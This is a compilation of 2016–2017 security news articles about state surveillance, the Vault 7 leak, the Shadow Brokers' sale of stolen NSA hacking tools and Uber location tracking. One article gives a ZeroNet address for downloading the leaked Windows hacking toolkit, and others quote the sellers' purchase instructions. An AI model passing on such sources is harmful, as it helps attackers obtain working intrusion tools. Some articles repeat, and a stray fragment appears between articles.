According to WikiLeaks, the files, dated between 2013 and 2016, include malware and exploits targeting the products of several major tech companies, including Apple, Google, Microsoft and Samsung. The leaked tools can allegedly be used to hack mobile devices, desktop computers, routers, smart TVs and other types of systems.

WikiLeaks

These pieces of software are said to have been developed by the CCI’s Engineering Development Group (EDG). WikiLeaks said the EDG develops, tests and provides support for backdoors, exploits, Trojans, viruses and other types of malware used by the CIA.

In addition to hacking tools developed by its own people, the agency allegedly obtained tools from British intelligence agencies (GCHQ and MI5), the NSA, the FBI and cyber arms contractors. For instance, the agency is said to have collaborated with MI5 on the development of a tool designed for spying on people through Samsung smart TVs.

The CIA allegedly has dozens of zero day exploits designed for targeting devices running Android, iOS, Windows, OS X and Linux. WikiLeaks claims some of these tools even allow the agency to bypass the encryption of secure messaging apps such as Signal, WhatsApp, and Telegram.

However, this does not necessarily mean these applications have been compromised – an attacker who has root access to a mobile device can often access messages exchanged via secure IM apps without the need to break the encryption.

WikiLeaks will not release the tools and exploits “until a consensus emerges on the technical and political nature of the CIA's program and how such 'weapons' should analyzed, disarmed and published.”

The files also appear to show that the CIA has developed tools designed for targeting the control systems of modern vehicles, multi-platform malware, and threats that add themselves to CDs and DVDs in order to jump air gaps.

Following the Edward Snowden leaks, the U.S. government has promised to disclose serious vulnerabilities that represent a high risk or affect a product that is widespread in critical infrastructure. If the files obtained by WikiLeaks are genuine, the CIA breached that commitment.


German foreign intelligence service Spied on Foreign Journalists since 1999
2.3.2017 securityaffairs BigBrothers

A new report from Der Spiegel the German foreign intelligence service spied on journalists from BBC, New York Times and Reuters since 1999.
Journalists from the BBC, Reuters and New York Times were among those spied on by
The German foreign intelligence service spied on journalists from various media agencies, including the BBC, Reuters and the New York Times.

German foreign intelligence service

According to the German magazine Der Spiegel, the number of reporters spied by the Bundesnachrichtendienst (BND) is at least 50 and the agencies is carrying out surveillance activities since 1999.

“Germany’s foreign intelligence agency, the BND, apparently spied on large numbers of foreign journalists overseas over the course of several years, including employees of the BBC, Reuters and the New York Times. Critics see a massive violation of press freedoms.” reads the Der Spiegel.

Der Spiegel obtained BND documents listing journalists’ emails, faxes, and telephone numbers.

“The document reportedly showed more than a dozen BBC journalists were being monitored via numbers at the organisation’s London headquarters and in Afghanistan.” reported the Independent.

The list also included several mobile and satellite phone numbers used by reporters at Reuters and a New York Times phone number. Reuters news agency in Afghanistan,

The numbers of the Reuters news agency belongs to journalists in Afghanistan, Pakistan, and Nigeria, but according to the Der Spiegel, other organisations in Kuwait, Lebanon, India, Nepal, Indonesia, and Zimbabwe were targeted by the cyber spies.

Of course, news Agency and broadcasters spied by the German foreign intelligence service expressed disappointment over the revelations.

“We are disappointed to hear these claims,” a BBC spokesperson said.

“The BBC’s mission is to bring accurate news and information to people around the world, and our journalists should be able to operate freely and safely, with full protection for their sources.

“We call upon all governments to respect the operation of a free press.”

The BND has refused to comment the allegations anyway it clarified that every operative aspect of its activity will be discussed only with the German government and politicians on parliament’s intelligence oversight committee.

The reports have been revealed while the Bundestag is investigating surveillance activities conducted by the US National Security Agency (NSA) and BND.


The Singaporean Defence Ministry was hit by a cyber attack, no secrets were exfiltrated
28.2.2017 securityaffairs BigBrothers

The Singaporean Defence Ministry confirmed that threat actors have breached government systems stealing personal information of its employees.
On Tuesday, the Defence Ministry confirmed that unknown hackers have breached government system and have stolen personal information belonging about 850 Singapore national servicemen and employees.

Data accessed by hackers includes telephone numbers, dates of birth, and national ID numbers.

According to the Singaporean Defence Ministry the hackers were searching for official secrets.

The Singaporean Defence Ministry discovered the security breach this month, the hackers penetrated the I-net system that provides Internet access to national servicemen and employees for their personal communications or Internet surfing.

I-net computer terminals are used in both MINDEF and Singapore Armed Forces (SAF) camps and premises. The nature of the attack suggests investigators the attackers are politically motivated.

According to the ministry, the hackers haven’t exfiltrated classified military information because it is not accessible from the I-net.

“Classified matters in MINDEF/SAF use a different computer system with more stringent security features and are not connected to the Internet,” the official statement published on its website stated.

“The attack on I-net appeared to be targeted and carefully planned,” it said.

“The real purpose may have been to gain access to official secrets, but this was prevented by the physical separation of I-net from our internal systems,” MINDEF added.

“We will continually strengthen our cyber defenses as the level of targeted attacks is expected to continue and rise,”

The ministry told the Cyber Security Agency and the Government Technology Agency to extend the investigation to other government systems, fortunately, at the time I was writing no other security breach had been discovered by the experts.

In middle 2015, the Government of Singapore announced the separation of civil servants’ work computers from the Internet in order to secure Government networks. The measure was aimed at preventing cyber attacks that could inject malware into the government email network.

The local news agency The Straits Times reported that the measure impacted some 100,000 computers.

Even before the announcement a number of ministries in Singapore, including the defence and the foreign affairs ministries, had been using separate systems to access the Internet.

Singaporean Defence Ministry

The Government and national infrastructure are a privileged target of hackers, in 2014 a section of the prime minister’s website, as well the website of the presidential residence were targeted by unknown attackers.

In December 2015, experts at FireEye discovered a stealthy botnet relying on a backdoor called LATENTBOT that compromised companies around, including Singapore. In January, a new variant of the infamous Tinba banking trojan has emerged in the wild and targeted financial institutions in the Asia Pacific region, including Singapore.

[adrotate banner=”9″]


Privacy groups claim FBI hacking operation in the PlayPen case was unconstitutional
11.2.2017 securityaffeirs BigBrothers

According to Privacy groups, the FBI search warrant used to hack into thousands of computers around the world in the PlayPen case was unconstitutional,
Privacy groups are claiming the FBI hacking campaign against the Playpen child pornography community violated international law.

According to the court documents, the FBI monitored the Playpen bulletin board Tor hidden service launched in August 2014, named Playpen, mainly used for “the advertisement and distribution of child pornography.”

The Playpen hidden service reached in one year over 200,000 users, with over 117,000 total posts mainly containing child pornography content. The law enforcement discovered nearly 1300 IP addresses belonging to the visitors.

PlayPen FBI hacked Tor Users child pornography NIT

According to Motherboard, the server running Playpen was seized by the FBI from a web host in North Carolina, then the law enforcement managed the computer to track its visitors. The agents used the network investigative technique (NIT) to obtain the IP addresses of the Playpen users.

The Feds hacked 8,700 computers in 120 countries, based on a single warrant, a procedure considered unconstitutional by privacy advocates. The US Law enforcement has expanded its extraterritorial surveillance capabilities without the consent of the states that were hosting the computers targeted by their malware.

“The FBI’s hacking operation in this case represents an enormous expansion of its extraterritorial surveillance capabilities — affecting thousands of computers in over a hundred countries around the world.” wrote Scarlet Kim, a legal officer with U.K.-based Privacy International. “How will other countries react to the FBI hacking in their jurisdictions without prior consent?”

What if a foreign intelligence agency of law enforcement body had carried out a similar hacking operation that compromised the computers of US citizens?

Last week, the U.K.-based Privacy International group, the Electronic Frontier Foundation (EFF) and the American Civil Liberties Union of Massachusetts, filed briefs in a lawsuit involving the FBI’s Playpen investigation.

The privacy groups filed briefs in a case involving Alex Levin, who is one of the suspects in the FBI’s Playpen investigation that was identified by the Feds thanks to the NIT (Network investigative technique).

The privacy advocates claim that the single warrant used by the FBI to conduct the hacking operations is not valid.

According to the EFF and ACLU groups, the warrant was invalid because the U.S. Constitution prohibits such kind of search on US citizens.

““No one questions the need for the FBI to investigate serious crimes like child pornography. But even serious crimes can’t justify throwing out our basic constitutional principles. Here, on the basis of a single warrant, the FBI searched 8,000 computers located all over the world,” EFF attorney Mark Rumold wrote in a blog post. “If the FBI tried to get a single warrant to search 8,000 houses, such a request would unquestionably be denied.”

The EFF consider unconstitutional the use of a single warrant to hack in so huge number of computers across the word.

On the other side, U.S. attorneys believe the Feds followed proper procedures in obtaining the warrant, there was no other way to unclock the criminals involved in the PlayPen case.


Government Contractor Indicted Over Theft of Secret Documents

9.2.2017 securityweek BigBrothers
Harold Thomas Martin III, the former U.S. government contractor arrested last year for theft of classified material, was indicted on Wednesday by a federal grand jury.

Martin, age 52, of Glen Burnie, Maryland, had worked as a security contractor for several government agencies between 1993 and 2016 through at least seven private companies. Similar to the whistleblower Edward Snowden, he worked at the National Security Agency (NSA) while employed by intelligence contractor Booz Allen Hamilton.

According to authorities, Martin held Top Secret and Sensitive Compartmented Information (SCI) clearances, which provided him access to classified government computer systems, programs and information.

The indictment alleges that Martin stole vast amounts of classified material between 1996 and August 2016, when he was arrested. The files, including ones containing information that could cause serious damage to national security, were found in his home and car.

Investigators said the man had stolen 50 terabytes of files, including secret, top-secret and SCI documents related to the NSA, the Cyber Command (USCYBERCOM), the National Reconnaissance Office (NRO), and the Central Intelligence Agency (CIA).

“The indictment alleges that Martin knew that the stolen documents contained classified information that related to the national defense and that he was never authorized to retain these documents at his residence or in his vehicle,” said the Justice Department.

Martin has been indicted on 20 counts of willful retention of national defense information and he faces up to 10 years in prison for each count.

While the suspect’s attorneys have not made any comments recently, The Washington Post reported that they had previously claimed Martin was taking documents home in an effort to become better in his job and he did not intend to provide any information to foreign governments.

At one point, some reports linked Martin to Shadow Brokers, the group that offered to sell exploits and tools allegedly stolen from the NSA-linked cyber espionage team known as the Equation Group.


President Obama commutes Chelsea Manning sentence
18.1.2017 securityaffairs BigBrothers
President Barack Obama has commuted Chelsea Manning’s sentence for leaking confidential documents to Wikileaks in 2010. He will be released on May 17th.
President Barack Obama took a historic decision, he has commuted Chelsea Manning’s sentence for leaking classified documents to Wikileaks in 2010. The news was reported by The New York Times, Manning is due to be released on May 17th.

Chelsea Manning, born as Bradley Manning, was sentenced to 35 years in 2013, when he was serving the US Army passed diplomatic cables to the anti-secrecy group Wikileaks.


The data leak was one of the largest breaches of classified documents in the history of the United States.

At the time of the data leak, Bradley Manning was serving as an intelligence analyst in Iraq. He provided more than 700,000 documents to WikiLeaks, the huge trove of documents includes the video of a 2007 airstrike in Baghdad that caused the death of two Reuters employees.

Recently Wikileaks announced the Assange’s intention agree to US extradition if Obama grants Manning’s clemency.

Follow
WikiLeaks ✔ @wikileaks
If Obama grants Manning clemency Assange will agree to US extradition despite clear unconstitutionality of DoJ case https://twitter.com/wikileaks/status/765626997057921025 …
8:40 PM - 12 Jan 2017
6,691 6,691 Retweets 5,676 5,676 likes
Follow
WikiLeaks ✔ @wikileaks
Assange: "Thank you to everyone who campaigned for Chelsea Manning's clemency. Your courage & determination made the impossible possible."
11:29 PM - 17 Jan 2017
4,295 4,295 Retweets 9,148 9,148 likes
“Obama may well have just saved Chelsea Manning’s life,” commented Sarah Harrison, who has defended Manning as Active Director of the Courage nonprofit. “Freeing her is clearly and unambiguously the right thing to do.”

She confirmed anyway the criticism for the President Obama’s decision to persecute Manning under the Espionage Act.

“Today’s news will not make good the harm done on Obama’s watch,” Harrison added. “Chelsea’s conviction under the Espionage Act and 35-year sentence set a terrible precedent that is left entirely intact by this commutation. Who knows what Donald Trump will do with this precedent, and these powers, that Obama has left him?”
The Manning’s commutation was part of a larger effort of the US Government that resulted in 209 commutations and 64 pardons. President Obama issued 1,385 grants of commutation during his administration, none made like him.

e remotely accessible.


ShadowBrokers exits releasing another arsenal of tools to hack Windows
13.1.2017 securityaffairs BigBrothers

The ShadowBrokers hacking group that broke into the NSA arsenal and stole its hacking tools is signing off, leaving a gift to the security community.
The mysterious hacking group calling themselves “The Shadow Brokers” has apparently decided to put an end to their failed attempts to sell exploits and hacking tools they claimed to have stolen from the NSA-linked Equation Group.
A few days ago the notorious hacker group Shadow Brokers announced the sale of an archive of Windows exploits and hacking tools stolen from the NSA-linked Equation group.

ShadowBrokers

The ShadowBrokers is the hacker crew that leaked a portion of the arsenal of the NSA-Linked Equation Group, a database containing hacking tools and exploits.

In October 2016, the hackers leaked a dump containing a list of servers that were hacked by the NSA-linked group known as Equation Group.

The Equation group compromised these targets using the hacking tools codenamed as INTONATION and PITCHIMPAIR. The ShadowBrokers provided the links to two distinct PGP-encrypted archives, the first one offered for free as a proof of the hack (its passphrase was ‘auctioned’), for the second one the group requested 1 million BTC .

The first archive was containing roughly 300MBs of data, including firewall exploits, hacking tools, and scripts with cryptonyms like BANANAUSURPER, BLATSTING, and BUZZDIRECTION.

The Equation Group ‘s hackers targeted products made by Cisco, Fortigate, Juniper, TOPSEC, and Watchguard.

Early October, TheShadowBrokers complained that no one seems to be bidding on their precious archive, an alleged member of the hacker group expressed his dissent on the lack of interest in ponying up bitcoins to release the full NSA data dump.

In December 2016, the group announced the launch of a crowdfunding campaign for the stolen arsenal because its auction received offers for less than two bitcoins.

In December 2016, when they changed the model of sale offering the NSA’s hacking arsenal for direct sale on an underground website.

Now the group has decided to exit from the scene, according to the message published on the website it used for direct sales of the hacker tools, the hackers will go in the dark because continuing their activities is too risky.

The group explained that their main target was the sale of the stolen hacking tools and exploits, but no one has brought them.

Shadow Brokers crew published a Bitcoin address explaining that they would return in the case someone will pay 10,000 Bitcoins for the exploits. The offer will be valid forever.

Before leaving the cyber arena, the group decided to release some gifts, a collection of 58 Windows hacking tools. These tools are able to avoid detection of security solutions. If you are interested in downloading the precious archive visit the group’s website on ZeroNet:

https://onlyzero.net/theshadowbrokers.bit


Stolen NSA "Windows Hacking Tools" Now Up For Sale!
11.1.2017 thehackernews BigBrothers
The Shadow Brokers who previously stole and leaked a portion of the NSA hacking tools and exploits is back with a Bang!
The hacking group is now selling another package of hacking tools, “Equation Group Windows Warez,” which includes Windows exploits and antivirus bypass tools, stolen from the NSA-linked hacking unit, The Equation Group.
For those unfamiliar with the topic, The Shadow Brokers is a notorious group of black-hat hackers who, in August 2016, leaked exploits, security vulnerabilities, and "powerful espionage tools" created by The Equation Group.


On Saturday, the Shadow Brokers posted a message on their ZeroNet based website, announcing the sale of the entire "Windows Warez" collection for 750 Bitcoin (around US$678,630).
The data dump contains many windows hacking tools, categorized as following:
Fuzzing tools (used to discover errors and security loopholes)
Exploit Framework
Network Implants
Remote Administration Tools (RAT)
Remote Code Execution Exploits for IIS, RDP, RPC, SMB Protocols (Some Zero-Days)
SMB BackDoor (Implant)
Interestingly, the Remote Administration Tool (RAT) "DanderSpritz" included in the list is the one previously leaked in the NSA's documents revealed by Edward Snowden.


Besides this, malware researcher Jacob Williams analyzed the archive of "screenshots and output of the find command across the dump" provided by the hacker as an evidence of legitimacy and estimated that the tools may also include a Fully Undetectable Malware (FUD) toolkit.

The FUD toolkit might have an ability to "evade/bypass personal security products," such as Avira, Avast, Dr.Web, ESET Antivirus, Comodo, McAfee Antivirus, Microsoft Essential, Panda, Symantec, Trend Micro and Kaspersky Antivirus.
The buyers can purchase the entire database of hacking tools that The Equation Group used against various countries to expand its espionage operations.
In August, the Shadow Brokers announced an auction attempting to sell the complete set of tools to the highest bidder, but the group canceled their auction in October due to little or no response on their public sale.
But since this time the group has made Windows hacking tools up for sale, the chances are that hackers and espionage groups would be interested in buying these hacking tools.


BigBrothers1

 

ShadowBrokers offers for sale the stolen NSA Windows Hacking Tools
11.1.2017 securityaffairs BigBrothers
The ShadowBrokers is the hacker crew stolen the arsenal of the NSA-Linked Equation Group is offering for sale the stolen NSA Windows Hacking Tools.
The ShadowBrokers is the hacker crew that leaked a portion of the arsenal of the NSA-Linked Equation Group, a precious archive containing hacking tools and exploits.

At the end of October, the hackers leaked a fresh dump containing a list of servers that were hacked by the NSA-linked group known as Equation Group.

The Equation group compromised these targets using the hacking tools codenamed as INTONATION and PITCHIMPAIR. The ShadowBrokers provided the links to two distinct PGP-encrypted archives, the first one offered for free as a proof of the hack (its passphrase was ‘auctioned’), for the second one the group requested 1 million BTC .

The first archive was containing roughly 300MBs of data, including firewall exploits, hacking tools, and scripts with cryptonyms like BANANAUSURPER, BLATSTING, and BUZZDIRECTION.

The security researchers Mustafa Al-Bassam published an interesting post that lists all the exploits, implants, and tools for hacking firewalls (“Firewall Operations”) included in the dump.

The Equation Group ‘s hackers targeted products made by Cisco, Fortigate, Juniper, TOPSEC, and Watchguard.

The majority of files are at least three years old, meanwhile, the newest timestamp dating to October 2013.

Early October, TheShadowBrokers complained that no one seems to be bidding on their precious archive, an alleged member of the hacker group expressed his dissent on the lack of interest in ponying up bitcoins to release the full NSA data dump.

Earlier December 2016, the group announced the launch of a crowdfunding campaign for the stolen arsenal because its auction received offers for less than two bitcoins.

We met Shadow Brokers last time in December 2016, when they changed the model of sale offering the NSA’s hacking arsenal for direct sale on an underground website.

The hacking group is back and now it is selling another package of hacking tools, “Equation Group Windows Warez.” The new archive includes a collection of Windows exploits and tools to evade detection of antivirus solutions.

ShadowBrokers
The first malware, the Remote Administration Tool (RAT) “DanderSpritz,” was included in the collection of documents leaked by Edward Snowden.

The group posted a message on their website on the ZeroNet, announcing the sale of the entire “Windows Warez” archive for 750 Bitcoin (around US$678,630).

The data dump offered for sale contains several hacking tools grouped in the following categories:

Fuzzing tools (used to discover errors and security loopholes)
Exploit Framework
Network Implants
Remote Administration Tools (RAT)
Remote Code Execution Exploits for IIS, RDP, RPC, SMB Protocols (Some Zero-Days)
SMB BackDoor (Implant)
The malware researcher Jacob Williams published an analysis of the archive of “screenshots and output of the find command across the dump” provided by the ShadowBrokers.Williams started searching for info on the term “Psp_Avoidance” reported in one of the screenshots published by the group.

Making some Google Queries with the term “psp computer network operations” the researcher get back as the fifth result a page from ManTech. The page details the ACTP CNO Programmer Course and the course documentation indicates that PSP is an acronym for “Personal Security Product.”

“So, circling back around, what is Psp_Avoidance? Obviously, we don’t know – but if the acronym is correct, it would seem to be software built to evade personal security products, which directory listings suggest (as does ManTech) are antivirus programs.” wrote the expert.
“Should you run antivirus products? Sure. At Rendition Infosec we tell customers that operating without AV is like driving a car with no airbags. But this dump suggests that advanced attackers have mitigations for antivirus products – a sobering reality for organizations without defense in depth. “
The unique certainly at this moment is the availability for sale of a powerful arsenal also composed of hacking tools that could be exploited by a threat actor in the wild for large-scale espionage campaigns

But since this time the group has made Windows hacking tools up for sale, the chances are that hackers and espionage groups would be interested in buying these hacking tools.


The Shadow Brokers are offering the NSA arsenal for direct sale
16.12.2016 securityaffairs
BigBrothers

The Shadow Brokers group has changed the model of sale, it has put up the NSA’s hacking arsenal for direct sale on an underground website.
The Shadow Brokers – Summary of the events

We have seen the notorious hacker group at the end of October, when the hackers leaked a fresh dump containing a list of servers that were hacked by the NSA-linked group known as Equation Group.

The Equation group compromised these targets using the hacking tools codenamed as INTONATION and PITCHIMPAIR. The ShadowBrokers provided the links to two distinct PGP-encrypted archives, the first one offered for free as a proof of the hack (its passphrase was ‘auctioned’), for the second one the group requested 1 million BTC .codenamed as INTONATION and PITCHIMPAIR. The ShadowBrokers provided the links to two distinct PGP-encrypted archives, the first one offered for free as a proof of the hack (its passphrase was ‘auctioned’), for the second one the group requested 1 million BTC .
The first archive was containing roughly 300MBs of data, including firewall exploits, hacking tools, and scripts with cryptonyms like BANANAUSURPER, BLATSTING, and BUZZDIRECTION.
The security researchers Mustafa Al-Bassam published an interesting post that lists all the exploits, implants, and tools for hacking firewalls (“Firewall Operations”) included in the dump.

The Equation Group ‘s hackers targeted products made by Cisco, Fortigate, Juniper, TOPSEC, and Watchguard.

The majority of files are at least three years old, meanwhile, the newest timestamp dating to October 2013.

Early October, TheShadowBrokers complained that no one seems to be bidding on their precious archive, an alleged member of the hacker group expressed his dissent on the lack of interest in ponying up bitcoins to release the full NSA data dump.

A couple of weeks before the group announced the launch of a crowdfunding campaign for the stolen arsenal because its auction received offers for less than two bitcoins.

The hacker group that’s believed to be behind the high-profile cyber theft of NSA hacking tools and exploits that sparked a larger debate on the Internet concerning abilities of US intelligence agencies and their own security.
Back to the present

Now, once again, the group has changed the model of sale, it has put up the NSA’s hacking arsenal for direct sale on an underground website.

The file offered on the website contains a file signed with the cryptographic key of The Shadow Brokers, confirming the intent of the group in selling the entire NSA arsenal directly to buyers one by one.

Someone using the Boceffus Cleetus online moniker published a post on Medium titled “Are the Shadow Brokers selling NSA tools on ZeroNet?” announcing that the Shadow Brokers hackers are now offering for sale the “NSA tools individually.”

Segui
Boceffus Cleetus @CleetusBocefus
I just published “Are the Shadow Brokers selling NSA tools on ZeroNet?” https://medium.com/p/are-the-shadow-brokers-selling-nsa-tools-on-zeronet-6c335891d62a …
11:35 - 14 Dic 2016
Photo published for Are the Shadow Brokers selling NSA tools on ZeroNet?

Photo published for Are the Shadow Brokers selling NSA tools on ZeroNet?
Are the Shadow Brokers selling NSA tools on ZeroNet?
“…this is for the people of the sun!”
medium.com
18 18 Retweet 14 14 Mi piace
ZeroNet is a decentralized network of peer-to-peer users for hosting websites.

“ZeroNet uses bitcoin cryptography and the BitTorrent network.The BitTorrent website Play hosts a magnet link repository on ZeroNet, which links to copyrighted content. There is a Reddit community which offers support for ZeroNet.” states Wikipedia.

“Well howdy partners! I don’t wanna be getting arrested for passing on fake news and all. I rekon [sic] I ain’t no security professional but I am whutcha might call a ZeroNet enthusiast,” Cleetus writes. ZeroNet is a platform for hosting websites using blockchain and BitTorrent technology.

“Those dastardly ole shadow brokers have themselves a zite on ZeroNet. Yep and fars as I can tell they appears to be sellin NSA tools individually now,” added Cleetus.

The website includes a list of the products available for sale as explained by Joseph Cox from Motherboard.

The items are classified type, the list includes “exploits,” “Trojans,” and “implant-”

Shadow Brokers NSA arsenal

“The site includes a long list of supposed items for sale, with names like ENVOYTOMATO, EGGBASKET, and YELLOWSPIRIT. Each is sorted into a type, such as “implant,” “trojan,” and “exploit,” and comes with a price tag between 1 and 100 bitcoins ($780—$78,000). Customers can purchase the whole lot for 1000 bitcoins ($780,000).” states the post published on Motherboard.

“The site also lets visitors download a selection of screenshots and files related to each item. Along with those is a file signed with a PGP key with an identical fingerprint to that linked to the original Shadow Brokers dump of exploits from August. This newly uncovered file was apparently signed on 1 September; a different date to any of The Shadow Brokers’ previously signed messages.”

“If you like, you email TheShadowBrokers with name of Warez [the item] you want make purchase,” a message on the site reads. “TheShadowBrokers emailing you back bitcoin address. You make payment. TheShadowBrokers emailing you link + decryption password. Files as always being signed,” states the message on the website.


The Shadow Brokers are offering the NSA arsenal for direct sale
15.12.2016 securityaffairs
BigBrothers

The Shadow Brokers group has changed the model of sale, it has put up the NSA’s hacking arsenal for direct sale on an underground website.
The Shadow Brokers – Summary of the events

We have seen the notorious hacker group at the end of October, when the hackers leaked a fresh dump containing a list of servers that were hacked by the NSA-linked group known as Equation Group.

The Equation group compromised these targets using the hacking tools codenamed as INTONATION and PITCHIMPAIR. The ShadowBrokers provided the links to two distinct PGP-encrypted archives, the first one offered for free as a proof of the hack (its passphrase was ‘auctioned’), for the second one the group requested 1 million BTC .codenamed as INTONATION and PITCHIMPAIR. The ShadowBrokers provided the links to two distinct PGP-encrypted archives, the first one offered for free as a proof of the hack (its passphrase was ‘auctioned’), for the second one the group requested 1 million BTC .
The first archive was containing roughly 300MBs of data, including firewall exploits, hacking tools, and scripts with cryptonyms like BANANAUSURPER, BLATSTING, and BUZZDIRECTION.
The security researchers Mustafa Al-Bassam published an interesting post that lists all the exploits, implants, and tools for hacking firewalls (“Firewall Operations”) included in the dump.

The Equation Group ‘s hackers targeted products made by Cisco, Fortigate, Juniper, TOPSEC, and Watchguard.

The majority of files are at least three years old, meanwhile, the newest timestamp dating to October 2013.

Early October, TheShadowBrokers complained that no one seems to be bidding on their precious archive, an alleged member of the hacker group expressed his dissent on the lack of interest in ponying up bitcoins to release the full NSA data dump.

A couple of weeks before the group announced the launch of a crowdfunding campaign for the stolen arsenal because its auction received offers for less than two bitcoins.

The hacker group that’s believed to be behind the high-profile cyber theft of NSA hacking tools and exploits that sparked a larger debate on the Internet concerning abilities of US intelligence agencies and their own security.
Back to the present

Now, once again, the group has changed the model of sale, it has put up the NSA’s hacking arsenal for direct sale on an underground website.

The file offered on the website contains a file signed with the cryptographic key of The Shadow Brokers, confirming the intent of the group in selling the entire NSA arsenal directly to buyers one by one.

Someone using the Boceffus Cleetus online moniker published a post on Medium titled “Are the Shadow Brokers selling NSA tools on ZeroNet?” announcing that the Shadow Brokers hackers are now offering for sale the “NSA tools individually.”

Segui
Boceffus Cleetus @CleetusBocefus
I just published “Are the Shadow Brokers selling NSA tools on ZeroNet?” https://medium.com/p/are-the-shadow-brokers-selling-nsa-tools-on-zeronet-6c335891d62a …
11:35 - 14 Dic 2016

Photo published for Are the Shadow Brokers selling NSA tools on ZeroNet?
Photo published for Are the Shadow Brokers selling NSA tools on ZeroNet?
Are the Shadow Brokers selling NSA tools on ZeroNet?
“…this is for the people of the sun!”
medium.com
17 17 Retweet 14 14 Mi piace
ZeroNet is a decentralized network of peer-to-peer users for hosting websites.

“ZeroNet uses bitcoin cryptography and the BitTorrent network.The BitTorrent website Play hosts a magnet link repository on ZeroNet, which links to copyrighted content. There is a Reddit community which offers support for ZeroNet.” states Wikipedia.

“Well howdy partners! I don’t wanna be getting arrested for passing on fake news and all. I rekon [sic] I ain’t no security professional but I am whutcha might call a ZeroNet enthusiast,” Cleetus writes. ZeroNet is a platform for hosting websites using blockchain and BitTorrent technology.

“Those dastardly ole shadow brokers have themselves a zite on ZeroNet. Yep and fars as I can tell they appears to be sellin NSA tools individually now,” added Cleetus.

The website includes a list of the products available for sale as explained by Joseph Cox from Motherboard.

The items are classified type, the list includes “exploits,” “Trojans,” and “implant-”

Shadow Brokers NSA arsenal

“The site includes a long list of supposed items for sale, with names like ENVOYTOMATO, EGGBASKET, and YELLOWSPIRIT. Each is sorted into a type, such as “implant,” “trojan,” and “exploit,” and comes with a price tag between 1 and 100 bitcoins ($780—$78,000). Customers can purchase the whole lot for 1000 bitcoins ($780,000).” states the post published on Motherboard.

“The site also lets visitors download a selection of screenshots and files related to each item. Along with those is a file signed with a PGP key with an identical fingerprint to that linked to the original Shadow Brokers dump of exploits from August. This newly uncovered file was apparently signed on 1 September; a different date to any of The Shadow Brokers’ previously signed messages.”

“If you like, you email TheShadowBrokers with name of Warez [the item] you want make purchase,” a message on the site reads. “TheShadowBrokers emailing you back bitcoin address. You make payment. TheShadowBrokers emailing you link + decryption password. Files as always being signed,” states the message on the website.


After Failed Auction, Shadow Brokers Opens NSA Hacking Tools for Direct Sales
15.12.2016 thehackernews
BigBrothers
Remember The Shadow Brokers?
The hacker group that's believed to be behind the high-profile cyber theft of NSA hacking tools and exploits that sparked a larger debate on the Internet concerning abilities of US intelligence agencies and their own security
The group put the stolen cyber weapons on auction but received not much response and gone quiet for some time.

However, The Shadow Brokers has now appeared to have put up the NSA's hacking tools and exploits for direct sale on an underground website.
A newly uncovered site reportedly contains a file signed with the cryptographic key of The Shadow Brokers, suggesting the hacker group has now moved to sell NSA hacking tools directly to buyers one by one, Motherboard reports.
On Wednesday, someone going by pseudonym Boceffus Cleetus published a post on Medium, saying that the Shadow Brokers hackers are now selling "NSA tools individually."
"The site also lets visitors download a selection of screenshots and files related to each item," notes Joseph Cox of Motherboard. "Along with those is a file signed with a PGP key with an identical fingerprint to that linked to the original Shadow Brokers dump of exploits from August."
The blog titled "Are the Shadow Brokers selling tools on ZeroNet?," reports a list of items, supposedly for sale on ZeroNet by the Shadow Brokers, with titles like "ENVOYTOMATO, EGGBASKET, and YELLOWSPIRIT."


ZeroNet is a decentralized Internet-like network for hosting websites using blockchain cryptography as DNS servers and BitTorrent technology as file servers.
Each of the items (NSA hacking tools) on the site is categorized into a type — like "exploits," "Trojans," and "implant" — each of which is ranged from 1 to 100 Bitcoins (from $780 to $78,000).
Anyone, including state-sponsored hackers with nation’s funding, could buy all the exploits for around $780,000.


Uber Now Tracks Your Location Even After Your Ride
9.12.2016 thehackernews BigBrothers
Uber was in controversies at the mid of this year for monitoring the battery life of its users, as the company believed that its users were more likely to pay a much higher price to hire a cab when their phone's battery is close to dying.
Uber is now tracking you even when your ride is over, and, according to the ride-hailing company, the surveillance will improve its service.
Uber recently updated its app to collect user location data in the background.
So, if you have updated your Uber app recently, your app's location tracking permissions have changed, allowing the app to monitor your location before and five minutes after your trip ends, even if you have closed the app.
A popup on the Uber app will ask you, "Allow 'Uber' to access our location even when you are not using the app?" You can click "Allow" or "Don't Allow" in response to this request. If you don't allow it, Uber won't track you.
According to the company, this information helps not only drivers find riders without making phone calls, but also Uber monitor driver service, making sure riders are picked up and dropped off on the proper side of the street in order to enhance safety.
Here's what Uber said in a statement:
"We're always thinking about ways we can improve the rider experience from sharpening our ETA estimates to identifying the best pick up location on any given street. Location is at the heart of the Uber experience, and we're asking riders to provide us with more information to achieve these goals."
Location data during a trip is collected during the following time periods:
When you're interacting with Uber and the app is foregrounded and visible.
When you are on a trip: from the time you request a trip until the trip is ended or canceled by the driver, even if the app is running in the background, but not visible to you.
Up to 5 minutes after the driver ends a trip, even if the Uber app is close in the background.
Uber announced the move last year which prompted a complaint [PDF] with the Federal Trade Commission. At te time, the Electronic Privacy Information Center said that "this collection of user's information far exceeds what customers expect from the transportation service."
It's unexpected from a big company like Uber "to collect location information when customers are not actively using the app." However, "the FTC failed to act, and Uber is now tracking users non-stop."
How to Stop Uber From Tracking Your Location
If you are worried, there's a way to get around it. The company also explains how to turn this feature off. Here's what to do to shut down this feature:
For Android Users: Settings → Apps → Uber → scroll to "Permission" → toggle "Location."
For users running Android Lollipop (5.1) and earlier: Settings → Location → toggle Off.
For iOS Users: Settings → Privacy → Location Services → Uber → choose "Never."
For more information on the feature, you can head on to the updated data collection agreement made by Uber.


Thieving Magpie allows NSA spies to snoop on in-flight mobile calls
9.12.2016 securityaffairs BigBrothers

The Thieving Magpie programme allows the NSA and the GCHQ to intercept data from passengers traveling on board commercial aircrafts.
This isn’t a sci-fi movie, the GCHQ and the NSA have spied on air passengers using in-flight GSM mobile services for years.

The news was revealed by new documents obtained by Edward Snowden and recently published by The Intercept.

Today, approximately 100 companies permit the in-flight use of mobile devices.

Passengers of the principal airlines (British Airways, Virgin Atlantic, Lufthansa, and many Arab and Asian companies) can access in-flight GSM mobile services using the system designed by the UK company AeroMobile and SitaOnAir. The passengers connect to the on-board GSM servers that communicate with satellites operated by British firm Inmarsat.

The spy agencies could target in-flight passengers through the “Thieving Magpie” programme. The system allows spying on the victims even when targets are not using the mobile devices for calls or any data transfer. It is sufficient that the phone is switched on and registered with the in-flight GSM service.

Below an excerpt from the presentation

“If a target’s phone is switched on, it Will attempt to register to its home network that it using the OnAir service even if they don’t actually make/receive a call.
Registration requests can be combined with the right number/callsign of the aircraft
